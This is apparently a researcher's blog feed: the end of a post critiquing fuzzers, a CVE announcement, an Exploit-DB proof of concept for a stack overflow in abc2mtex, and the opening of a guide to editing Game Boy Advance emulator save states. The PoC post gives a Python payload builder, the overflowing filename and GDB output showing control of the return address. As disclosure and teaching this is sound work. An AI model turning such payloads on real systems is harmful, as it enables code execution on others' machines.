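<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">fgets</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">),</span><span class="w"> </span><span class="n">input</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span>
<span class="w"> </span><span class="n">buf</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sc">'\0'</span><span class="p">;</span>
<span class="w"> </span><span class="n">fclose</span><span class="p">(</span><span class="n">input</span><span class="p">);</span>
<span class="w"> </span><span class="c1">// Run ./dmitry -w buf; execv only returns if it fails</span>
<span class="w"> </span><span class="n">execv</span><span class="p">(</span><span class="n">prog</span><span class="p">,</span><span class="w"> </span><span class="n">cmd</span><span class="p">);</span>
<span class="w"> </span><span class="n">perror</span><span class="p">(</span><span class="s">"execv"</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>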
<span class="p">}</span>
</code></pre></div>
<p>The crashes it did find pertain to <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-7938">CVE-2017-7938</a> — this program is also prone
to stack overflows (oops). Also, <strong>because most fuzzers rely on stack traces to
triage bugs, and these cases completely obliterate the stack, AFL can't tell that
they're the same bug</strong> (double oops).</p>
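<p>For readers who haven't seen stack-based triage up close, here is a minimal sketch of the general heuristic: hash the top few frames of a crash's backtrace and treat crashes with equal hashes as the same bug. The helper name, the depth of 3, and the frame values are all hypothetical, and this is not AFL's (or any other fuzzer's) actual deduplication code. It only illustrates why attacker-controlled bytes in the unwound frames split one bug into many "unique" crashes.</p>
<div class="highlight"><pre><span></span><code>import hashlib


def stack_signature(frames, depth=3):
    """Hash the top `depth` frame addresses of a backtrace (hypothetical helper)."""
    top = ",".join(hex(addr) for addr in frames[:depth])
    return hashlib.sha1(top.encode()).hexdigest()


# Two crashes caused by the same strcpy overflow. Because the saved return
# address and everything above it were overwritten, the "frames" a debugger
# unwinds are just whatever bytes each input wrote there (illustrative values).
crash_a = [0x414141414141, 0x4141414141414141, 0x4141414141414141]
crash_b = [0x424242424242, 0x4242424242424242, 0x4242424242424242]

# Same bug, different signatures, so they get bucketed as two distinct crashes.
print(stack_signature(crash_a) == stack_signature(crash_b))  # False
</code></pre></div>
<p>With an intact stack, the top frames would be the same real return addresses for every input that reaches the bug, and the signatures would match.</p>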
<p>Okay, that last paragraph was a bit hostile, so allow me to take a few steps back.
I'm not saying fuzzers are completely useless — I'm sure AFL could
find the format string 0-day in a few hours — but I do think fuzzing is overrated.
These tools rely on being very fast, at the cost of also being
very dumb, and we're already seeing the diminishing returns, even as academia turns
fuzzer optimization into an Olympic sport. I suspect these tools will never "become
smart" because smart usually means slow, which is the antithesis of fuzzing. By
calling attention to this trend (thank you for reading this far), I hope researchers
will consider other avenues towards smart bug hunting, as opposed to just making
fuzzing 5% faster, or adding better scaffolding to support kernels and other niche
applications. Those tasks are useful in their own ways, but they leave trivial
0-days like this on the table.</p>
<p>To that end, I'm happy to report that the tool I've been working on for the past
year, based on <a href="https://en.wikipedia.org/wiki/Symbolic_execution">symbolic execution</a>,
is what actually led me to this 0-day, and it did so in a mere 16 seconds. I
look forward to open sourcing the code, but I'm trying to get a paper
published first and it's currently locked in a "major revision" cycle at a top-tier
security conference. With any luck, the release will come at the beginning
of 2021. No one said research is fast.</p>
<p>Thanks for reading and happy hacking.</p>New CVE Published (CVE-2020-9549)2020-03-02T09:30:00-05:002020-03-02T09:30:00-05:00Carter Yagemanntag:carteryagemann.com,2020-03-02:/cve-2020-9549.html<p>CVE-2020-9549 has been assigned for a vulnerability I found in Pdfresurrect.
The details are available <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9549">here</a>.</p>
<p>This issue is currently being <a href="https://github.com/enferex/pdfresurrect/issues/8">patched</a>.</p>New PoC Published to Exploit-DB (EDB-ID-47254)2019-08-15T23:30:00-04:002019-08-15T23:30:00-04:00Carter Yagemanntag:carteryagemann.com,2019-08-15:/edb-id-47254.html<p>I published a <a href="https://www.exploit-db.com/exploits/47254">PoC for a new vulnerability</a>
in <code>abc2mtex</code> version 1.6.1. This was discovered while testing an analysis
framework I'm developing with my peers at Georgia Tech.</p>
<p>The vulnerability is due to an unsafe <code>strcpy</code> that allows an attacker to
overwrite a return address and achieve arbitrary
code execution. This is not the first time this program has been found to be
susceptible to buffer overflows (CVE-2004-1257), but the novelty of this PoC
is that exploitation is achieved using a long input filename whereas the previous
CVE relied on providing maliciously crafted data.</p>
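<p>The payload itself is simple arithmetic. In the GDB session below, 120 <code>A</code>s followed by <code>FEDCBA</code> put the last six bytes on <code>openIn</code>'s saved return address, which GDB then reports as <code>0x0000414243444546</code>. The byte order is reversed because x86-64 is little-endian, and the top two bytes are zero because <code>strcpy</code> writes a terminating NUL and the highest byte of the original return address (<code>0x0000555555556f00</code> in the first backtrace) was already zero. Below is a small Python sketch of that layout; the 120-byte offset is read off this particular build (Debian Buster, GCC 8.3.0) and is an assumption that may not hold for other compilers or flags.</p>
<div class="highlight"><pre><span></span><code>PADDING = 120       # 'A' bytes before the saved return address (from the GDB session)
TARGET = b"FEDCBA"  # six bytes that overwrite the low bytes of the return address


def build_filename(padding=PADDING, target=TARGET):
    """Return the long filename argument that smashes openIn's stack frame."""
    return b"A" * padding + target


def overwritten_return_address(target=TARGET):
    """Interpret the target bytes as a little-endian x86-64 address.

    strcpy writes a NUL after the last byte, and the top byte of the original
    return address was already zero, so the high bytes are zero-filled here.
    """
    return int.from_bytes(target.ljust(8, b"\x00"), "little")


payload = build_filename()
print(len(payload))                       # 126
print(hex(overwritten_return_address()))  # 0x414243444546
</code></pre></div>
<p>Passing <code>payload.decode()</code> as the first argument, e.g. via <code>subprocess.run(["./abc2mtex", payload.decode()])</code>, reproduces the command line used in the PoC.</p>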
<p>Below is a copy of the PoC published to Exploit-DB:</p>
<div class="highlight"><pre><span></span><code><span class="nx">Exploit</span><span class="w"> </span><span class="nx">Title</span><span class="p">:</span><span class="w"> </span><span class="nx">ABC2MTEX</span><span class="w"> </span><span class="m m-Double">1.6.1</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="nx">Command</span><span class="w"> </span><span class="nx">Line</span><span class="w"> </span><span class="nx">Stack</span><span class="w"> </span><span class="nx">Overflow</span>
<span class="nx">Date</span><span class="p">:</span><span class="w"> </span><span class="mi">2019</span><span class="o">-</span><span class="mi">08</span><span class="o">-</span><span class="mi">13</span>
<span class="nx">Exploit</span><span class="w"> </span><span class="nx">Author</span><span class="p">:</span><span class="w"> </span><span class="nx">Carter</span><span class="w"> </span><span class="nx">Yagemann</span><span class="w"> </span><span class="p"><</span><span class="nx">yagemann</span><span class="err">@</span><span class="nx">gatech</span><span class="p">.</span><span class="nx">edu</span><span class="p">></span>
<span class="nx">Vendor</span><span class="w"> </span><span class="nx">Homepage</span><span class="p">:</span><span class="w"> </span><span class="nx">https</span><span class="p">:</span><span class="c1">//abcnotation.com/abc2mtex/</span>
<span class="nx">Software</span><span class="w"> </span><span class="nx">Link</span><span class="p">:</span><span class="w"> </span><span class="nx">https</span><span class="p">:</span><span class="c1">//github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz</span>
<span class="nx">Version</span><span class="p">:</span><span class="w"> </span><span class="m m-Double">1.6.1</span>
<span class="nx">Tested</span><span class="w"> </span><span class="nx">on</span><span class="p">:</span><span class="w"> </span><span class="nx">Debian</span><span class="w"> </span><span class="nx">Buster</span>
<span class="nx">An</span><span class="w"> </span><span class="nx">unsafe</span><span class="w"> </span><span class="nx">strcpy</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">241</span><span class="w"> </span><span class="nx">allows</span><span class="w"> </span><span class="nx">an</span><span class="w"> </span><span class="nx">attacker</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">overwrite</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="k">return</span>
<span class="nx">address</span><span class="w"> </span><span class="nx">from</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">openIn</span><span class="w"> </span><span class="nx">function</span><span class="w"> </span><span class="nx">by</span><span class="w"> </span><span class="nx">providing</span><span class="w"> </span><span class="nx">a</span><span class="w"> </span><span class="nx">long</span><span class="w"> </span><span class="nx">input</span><span class="w"> </span><span class="nx">filename</span><span class="p">.</span><span class="w"> </span><span class="nx">This</span>
<span class="nx">carries</span><span class="w"> </span><span class="nx">similar</span><span class="w"> </span><span class="nx">risk</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">CVE</span><span class="o">-</span><span class="mi">2004</span><span class="o">-</span><span class="mi">1257</span><span class="p">.</span>
<span class="nx">Setup</span><span class="p">:</span>
<span class="err">$</span><span class="w"> </span><span class="nx">wget</span><span class="w"> </span><span class="nx">https</span><span class="p">:</span><span class="c1">//github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz</span>
<span class="err">$</span><span class="w"> </span><span class="nx">tar</span><span class="w"> </span><span class="o">-</span><span class="nx">xzf</span><span class="w"> </span><span class="nx">abc2mtex1</span><span class="m m-Double">.6.1</span><span class="p">.</span><span class="nx">tar</span><span class="p">.</span><span class="nx">gz</span>
<span class="err">$</span><span class="w"> </span><span class="nx">make</span>
<span class="err">$</span><span class="w"> </span><span class="nx">gcc</span><span class="w"> </span><span class="o">--</span><span class="nx">version</span>
<span class="nx">gcc</span><span class="w"> </span><span class="p">(</span><span class="nx">Debian</span><span class="w"> </span><span class="m m-Double">8.3.0</span><span class="o">-</span><span class="mi">6</span><span class="p">)</span><span class="w"> </span><span class="m m-Double">8.3.0</span>
<span class="nx">Copyright</span><span class="w"> </span><span class="p">(</span><span class="nx">C</span><span class="p">)</span><span class="w"> </span><span class="mi">2018</span><span class="w"> </span><span class="nx">Free</span><span class="w"> </span><span class="nx">Software</span><span class="w"> </span><span class="nx">Foundation</span><span class="p">,</span><span class="w"> </span><span class="nx">Inc</span><span class="p">.</span>
<span class="nx">This</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="nx">free</span><span class="w"> </span><span class="nx">software</span><span class="p">;</span><span class="w"> </span><span class="nx">see</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">source</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="nx">copying</span><span class="w"> </span><span class="nx">conditions</span><span class="p">.</span><span class="w"> </span><span class="nx">There</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="nx">NO</span>
<span class="nx">warranty</span><span class="p">;</span><span class="w"> </span><span class="k">not</span><span class="w"> </span><span class="nx">even</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="nx">MERCHANTABILITY</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="nx">FITNESS</span><span class="w"> </span><span class="nx">FOR</span><span class="w"> </span><span class="nx">A</span><span class="w"> </span><span class="nx">PARTICULAR</span><span class="w"> </span><span class="nx">PURPOSE</span><span class="p">.</span>
<span class="nx">PoC</span><span class="p">:</span>
<span class="err">$</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">abc2mtex</span><span class="w"> </span><span class="nx">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA</span>
<span class="nx">GDB</span><span class="p">:</span>
<span class="nx">We</span><span class="err">'</span><span class="nx">re</span><span class="w"> </span><span class="nx">going</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">place</span><span class="w"> </span><span class="nx">a</span><span class="w"> </span><span class="nx">breakpoint</span><span class="w"> </span><span class="nx">before</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="nx">after</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">241</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">show</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">overflow</span><span class="p">.</span>
<span class="err">$</span><span class="w"> </span><span class="nx">gdb</span><span class="w"> </span><span class="o">-</span><span class="nx">q</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">abc2mtex</span>
<span class="nx">Reading</span><span class="w"> </span><span class="nx">symbols</span><span class="w"> </span><span class="nx">from</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">abc2mtex</span><span class="o">...</span><span class="nx">done</span><span class="p">.</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="k">break</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">241</span>
<span class="nx">Breakpoint</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="mh">0x4139</span><span class="p">:</span><span class="w"> </span><span class="nx">file</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">,</span><span class="w"> </span><span class="nx">line</span><span class="w"> </span><span class="mi">241</span><span class="p">.</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="k">break</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">242</span>
<span class="nx">Breakpoint</span><span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="mh">0x414c</span><span class="p">:</span><span class="w"> </span><span class="nx">file</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">,</span><span class="w"> </span><span class="nx">line</span><span class="w"> </span><span class="mi">242</span><span class="p">.</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="nx">r</span><span class="w"> </span><span class="nx">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA</span>
<span class="nx">Starting</span><span class="w"> </span><span class="nx">program</span><span class="p">:</span><span class="w"> </span><span class="o">/</span><span class="nx">tmp</span><span class="o">/</span><span class="nx">tmp</span><span class="m m-Double">.4</span><span class="nx">jy8nhwOI3</span><span class="o">/</span><span class="nx">abc2mtex</span><span class="w"> </span><span class="nx">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA</span>
<span class="nx">Breakpoint</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="nx">openIn</span><span class="w"> </span><span class="p">(</span><span class="nx">filename</span><span class="p">=</span><span class="mh">0x7fffffffe240</span><span class="w"> </span><span class="sc">'A'</span><span class="w"> </span><span class="p"><</span><span class="nx">repeats</span><span class="w"> </span><span class="mi">120</span><span class="w"> </span><span class="nx">times</span><span class="p">>,</span><span class="w"> </span><span class="s">"FEDCBA"</span><span class="p">)</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">241</span>
<span class="mi">241</span><span class="w"> </span><span class="p">(</span><span class="nx">void</span><span class="p">)</span><span class="w"> </span><span class="nx">strcpy</span><span class="p">(</span><span class="nx">savename</span><span class="p">,</span><span class="nx">filename</span><span class="p">);</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="nx">bt</span>
<span class="err">#</span><span class="mi">0</span><span class="w"> </span><span class="nx">openIn</span><span class="w"> </span><span class="p">(</span><span class="nx">filename</span><span class="p">=</span><span class="mh">0x7fffffffe240</span><span class="w"> </span><span class="sc">'A'</span><span class="w"> </span><span class="p"><</span><span class="nx">repeats</span><span class="w"> </span><span class="mi">120</span><span class="w"> </span><span class="nx">times</span><span class="p">>,</span><span class="w"> </span><span class="s">"FEDCBA"</span><span class="p">)</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">241</span>
<span class="err">#</span><span class="mi">1</span><span class="w"> </span><span class="mh">0x0000555555556f00</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="nx">main</span><span class="w"> </span><span class="p">(</span><span class="nx">argc</span><span class="p">=</span><span class="mi">2</span><span class="p">,</span><span class="w"> </span><span class="nx">argv</span><span class="p">=</span><span class="mh">0x7fffffffe4f8</span><span class="p">)</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="nx">fields</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">273</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="nx">c</span>
<span class="nx">Continuing</span><span class="p">.</span>
<span class="nx">Breakpoint</span><span class="w"> </span><span class="mi">2</span><span class="p">,</span><span class="w"> </span><span class="nx">openIn</span><span class="w"> </span><span class="p">(</span><span class="nx">filename</span><span class="p">=</span><span class="mh">0x7fffffffe240</span><span class="w"> </span><span class="sc">'A'</span><span class="w"> </span><span class="p"><</span><span class="nx">repeats</span><span class="w"> </span><span class="mi">120</span><span class="w"> </span><span class="nx">times</span><span class="p">>,</span><span class="w"> </span><span class="s">"FEDCBA"</span><span class="p">)</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">242</span>
<span class="mi">242</span><span class="w"> </span><span class="p">(</span><span class="nx">void</span><span class="p">)</span><span class="w"> </span><span class="nx">strcat</span><span class="p">(</span><span class="nx">filename</span><span class="p">,</span><span class="s">".abc"</span><span class="p">);</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="nx">bt</span>
<span class="err">#</span><span class="mi">0</span><span class="w"> </span><span class="nx">openIn</span><span class="w"> </span><span class="p">(</span><span class="nx">filename</span><span class="p">=</span><span class="mh">0x7fffffffe240</span><span class="w"> </span><span class="sc">'A'</span><span class="w"> </span><span class="p"><</span><span class="nx">repeats</span><span class="w"> </span><span class="mi">120</span><span class="w"> </span><span class="nx">times</span><span class="p">>,</span><span class="w"> </span><span class="s">"FEDCBA"</span><span class="p">)</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">242</span>
<span class="err">#</span><span class="mi">1</span><span class="w"> </span><span class="mh">0x0000414243444546</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="p">??</span><span class="w"> </span><span class="p">()</span>
<span class="err">#</span><span class="mi">2</span><span class="w"> </span><span class="mh">0x00007fffffffe4f8</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="p">??</span><span class="w"> </span><span class="p">()</span>
<span class="err">#</span><span class="mi">3</span><span class="w"> </span><span class="mh">0x0000000200000000</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="p">??</span><span class="w"> </span><span class="p">()</span>
<span class="err">#</span><span class="mi">4</span><span class="w"> </span><span class="mh">0x0000000000000000</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="p">??</span><span class="w"> </span><span class="p">()</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="nx">c</span>
<span class="nx">Continuing</span><span class="p">.</span>
<span class="nx">file</span><span class="w"> </span><span class="s">"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA"</span><span class="w"> </span><span class="nx">does</span><span class="w"> </span><span class="k">not</span><span class="w"> </span><span class="nx">exist</span>
<span class="nx">Program</span><span class="w"> </span><span class="nx">received</span><span class="w"> </span><span class="nx">signal</span><span class="w"> </span><span class="nx">SIGSEGV</span><span class="p">,</span><span class="w"> </span><span class="nx">Segmentation</span><span class="w"> </span><span class="nx">fault</span><span class="p">.</span>
<span class="mh">0x0000414243444546</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="p">??</span><span class="w"> </span><span class="p">()</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="nx">quit</span>
</code></pre></div>A Beginner's Guide to Hacking Video Game Save States (Fire Emblem 7 on the GBA)2019-06-22T13:00:00-04:002019-06-22T13:00:00-04:00Carter Yagemanntag:carteryagemann.com,2019-06-22:/save-state-hacking-for-beginners.html<p>As a fun change of pace, I decided to write up a beginner's guide to hacking save states for video games.
In this tutorial, we're going to take a look at <a href="https://en.wikipedia.org/wiki/Fire_Emblem_%28video_game%29">Fire Emblem 7</a>
for the <a href="https://en.wikipedia.org/wiki/Game_Boy_Advance">Game Boy Advance</a> (GBA). Specifically, we're going to hack
the health bar of the final boss (spoilers!) down to 1 HP. In doing so, I'll cover the simplest practical reverse engineering
technique for game hacking: <em>differential analysis</em>. I'll be using an emulator for Android called
<a href="https://play.google.com/store/apps/details?id=com.johnemulators.johngbalite">John GBA</a>, so we'll also get into
a few details about how it works.</p>
<p>Conceptually, this guide is very similar to the start of the tutorial provided by <a href="https://en.wikipedia.org/wiki/Cheat_Engine">Cheat Engine</a>.
The main difference is that we're going to hack an actual video game by modifying an emulator's
save state data rather than using a debugger on a running toy program. Also, I'm going to perform all the steps
using only standard GNU/Linux programs and a little bit of Python scripting. Thus, this guide is intended for readers familiar
with basic programming and the command line who may not have considered hacking a video game before and want a simple, realistic example
to get started.</p>
<p>Enjoy.</p>
<h2>A Primer on Emulators & Save States</h2>
<p>I'll start with a brief summary of what an emulator is. Put simply, it reads a program written for one computer architecture
and executes it on another. In our case, the emulator I'm using can run games written for the GBA on an Android device. The most basic way
of accomplishing this is <em>interpretation</em>. Specifically, the emulator mimics the original architecture by allocating
memory to represent RAM, CPU registers, etc. It then loads the program into that memory just as the emulated system would
and steps through each instruction, modifying the memory accordingly. Collectively, the data values held in the emulated hardware at
any given moment make up the <em>emulation state</em>.</p>
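<p>To make the interpretation loop concrete, here is a toy sketch in Python. The three-instruction ISA, the register count, and the 256-byte RAM are all made up for illustration and have nothing to do with the GBA's actual ARM7TDMI CPU; the point is only that the emulation state is ordinary data (a list of registers, a byte array of RAM, and a program counter) that a fetch-decode-execute loop updates one instruction at a time.</p>
<div class="highlight"><pre><span></span><code>from dataclasses import dataclass, field


@dataclass
class EmulationState:
    regs: list = field(default_factory=lambda: [0] * 4)             # emulated CPU registers
    ram: bytearray = field(default_factory=lambda: bytearray(256))  # emulated RAM
    pc: int = 0                                                     # program counter


def step(state, program):
    """Fetch, decode, and execute one guest instruction."""
    op, a, b = program[state.pc]          # fetch + decode
    if op == "LOADI":                     # regs[a] = immediate b
        state.regs[a] = b
    elif op == "ADDI":                    # regs[a] += immediate b
        state.regs[a] += b
    elif op == "STORE":                   # ram[b] = low byte of regs[a]
        state.ram[b] = state.regs[a] & 0xFF
    else:
        raise ValueError(f"unknown opcode {op!r}")
    state.pc += 1


def run(program):
    """Interpret a guest program until the PC runs off the end."""
    state = EmulationState()
    while state.pc < len(program):
        step(state, program)
    return state


# Guest program: r0 = 60, r0 -= 1, store r0 at RAM address 0x10.
final = run([("LOADI", 0, 60), ("ADDI", 0, -1), ("STORE", 0, 0x10)])
print(final.regs[0], final.ram[0x10])  # 59 59
</code></pre></div>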
<p>Interpretation is the easiest form of emulation to implement, but it is slow because each instruction of the original system is decoded and carried out by
one or more (often many) instructions on the emulator's hardware. To get around this, real emulators often compile and optimize the
emulation logic "on-the-fly" using a technique called <em>just-in-time (JIT) compilation</em>. Optimizing emulators is an interesting topic
for discussion, but beyond the scope of this guide.</p>
<p>What we do need to understand is save states. By pausing the emulation and storing all the data associated with the emulation state, the emulator
can return to that state at any later time. All it has to do is read the saved state back into the memory representing the emulated
hardware. This gives us a clean way to hack video games by intentionally corrupting save states. We simply modify some data
in the saved state, and when the emulator loads it, our modifications propagate into the emulated system:</p>
<p><center>
<img alt="Figure 1" src="https://carteryagemann.com/images/hacking-save-state-fig1.png">
</center></p>
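<p>In the toy picture, a save state is just the emulation state serialized to bytes. The sketch below is self-contained and uses a hypothetical layout (four little-endian 32-bit registers followed by raw RAM) and a hypothetical RAM address for the boss's HP; it is not John GBA's actual format. It shows the whole trick: patch one byte in the saved blob, load it, and the change appears in the emulated RAM.</p>
<div class="highlight"><pre><span></span><code>import struct

REG_FMT = "<4I"  # hypothetical layout: four little-endian 32-bit registers, then RAM
HP_ADDR = 0x20   # hypothetical RAM address holding the boss's HP


def save_state(regs, ram):
    """Serialize the emulated registers and RAM into a save-state blob."""
    return struct.pack(REG_FMT, *regs) + bytes(ram)


def load_state(blob):
    """Rebuild the emulated registers and RAM from a save-state blob."""
    header = struct.calcsize(REG_FMT)
    regs = list(struct.unpack(REG_FMT, blob[:header]))
    ram = bytearray(blob[header:])
    return regs, ram


# Pause the "game" with the boss at 60 HP and save it.
regs, ram = [0, 1, 2, 3], bytearray(64)
ram[HP_ADDR] = 60
blob = bytearray(save_state(regs, ram))

# Corrupt the saved state on purpose: the HP byte sits after the register header.
blob[struct.calcsize(REG_FMT) + HP_ADDR] = 1

# Loading the patched state propagates the change into the emulated RAM.
regs, ram = load_state(bytes(blob))
print(ram[HP_ADDR])  # 1
</code></pre></div>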
<p>But in order to do that, we first have to figure out the formatting of the emulator's saved states.</p>
<h2>Reverse Engineering John GBA's Save State Format</h2>
<p>Lucky for us, this emulator's save state formatting is fairly standard and we don't need to understand most of the details for our basic
memory hack. First, we know the states have to be saved somewhere in storage. It turns out they're easy to find by browsing:
<code><internal_shared_storage>/Johnemulators/GBA/state</code>. In this directory we find two file formats: <code>.jg#</code> and <code>.js#</code> where <code>#</code> is the slot
number for the save (organizing saves as a linear list of slots is typical for video game emulators). It's easy to see which files
we care about for Fire Emblem 7:</p>
<div class="highlight"><pre><span></span><code>$ ls -l
total 301
-rw------- 1 carter carter 113059 Jun 22 02:31 Fire Emblem (U).jg0
-rw------- 1 carter carter 108703 Jun 22 04:24 Fire Emblem (U).jg1
-rw------- 1 carter carter 18502 Jun 22 02:31 Fire Emblem (U).js0
-rw------- 1 carter carter 67051 Jun 22 04:24 Fire Emblem (U).js1
</code></pre></div>
<p>A good first step towards figuring out their formats is to run <code>file</code> and see if there are any recognizable patterns:</p>
<div class="highlight"><pre><span></span><code>$ file -i *
Fire Emblem (U).jg0: application/gzip; charset=binary
Fire Emblem (U).jg1: application/gzip; charset=binary
Fire Emblem (U).js0: image/jpeg; charset=binary
Fire Emblem (U).js1: image/jpeg; charset=binary
</code></pre></div>
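<p>The <code>file</code> command identifies formats largely by matching "magic" byte signatures at the start of a file rather than trusting the extension. As a rough sketch of the same idea, covering only the two signatures that matter here (the real magic database is far larger): gzip data begins with <code>1f 8b</code> and JPEG data with <code>ff d8 ff</code>.</p>

```python
# Leading signatures for the two formats `file` reported above.
MAGIC = {
    b"\x1f\x8b": "application/gzip",
    b"\xff\xd8\xff": "image/jpeg",
}


def sniff(path):
    """Guess a file's type from its first few bytes, ignoring its extension."""
    with open(path, "rb") as fd:
        head = fd.read(4)
    for magic, mime in MAGIC.items():
        if head.startswith(magic):
            return mime
    return "unknown"
```

<p>Calling <code>sniff("Fire Emblem (U).jg1")</code> on the files above should report <code>application/gzip</code>, matching what <code>file</code> found.</p>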
<p>Luckily, despite the custom file extensions, each save state is just a JPEG image paired with a gzip-compressed data file. We don't need
to worry about the images, so let's focus on the data files. First, copy them off the Android device into a local directory. Also, make sure to
save a backup copy somewhere safe so you won't lose your data if you make a mistake! Next, let's decompress one of them:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># gzip expects compressed files to have the .gz extension,</span>
<span class="c1"># so we copy it to a new name first (this also leaves the original intact)</span>
cp<span class="w"> </span>Fire<span class="se">\ </span>Emblem<span class="se">\ \(</span>U<span class="se">\)</span>.jg1<span class="w"> </span><span class="m">1</span>.gz
gzip<span class="w"> </span>-d<span class="w"> </span><span class="m">1</span>.gz
<span class="c1"># after decompressing, gzip will automatically strip the extension</span>
<span class="c1"># from the filename</span>
</code></pre></div>
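<p>Alternatively, Python's standard <code>gzip</code> module recognizes gzip data by its header bytes and doesn't care about the extension, so a small helper can decompress a state without renaming anything. A minimal sketch (the function name is my own):</p>

```python
import gzip
import shutil


def decompress_state(src, dst):
    """Decompress gzip-compressed state data from src into dst, leaving src untouched."""
    # gzip.open recognizes the data by its header bytes, not its filename.
    with gzip.open(src, "rb") as fin, open(dst, "wb") as fout:
        shutil.copyfileobj(fin, fout)
```

<p>For example, <code>decompress_state("Fire Emblem (U).jg1", "1")</code> should produce the same decompressed <code>1</code> file as the shell commands above.</p>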
<p>And take a look at the beginning of the data:</p>
<div class="highlight"><pre><span></span><code>$ hexdump -C 1 | head
00000000 0a 00 00 00 46 49 52 45 45 4d 42 4c 45 4d 45 00 |....FIREEMBLEME.|
00000010 41 45 37 45 00 00 00 00 00 00 00 00 01 00 00 00 |AE7E............|
00000020 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 |................|
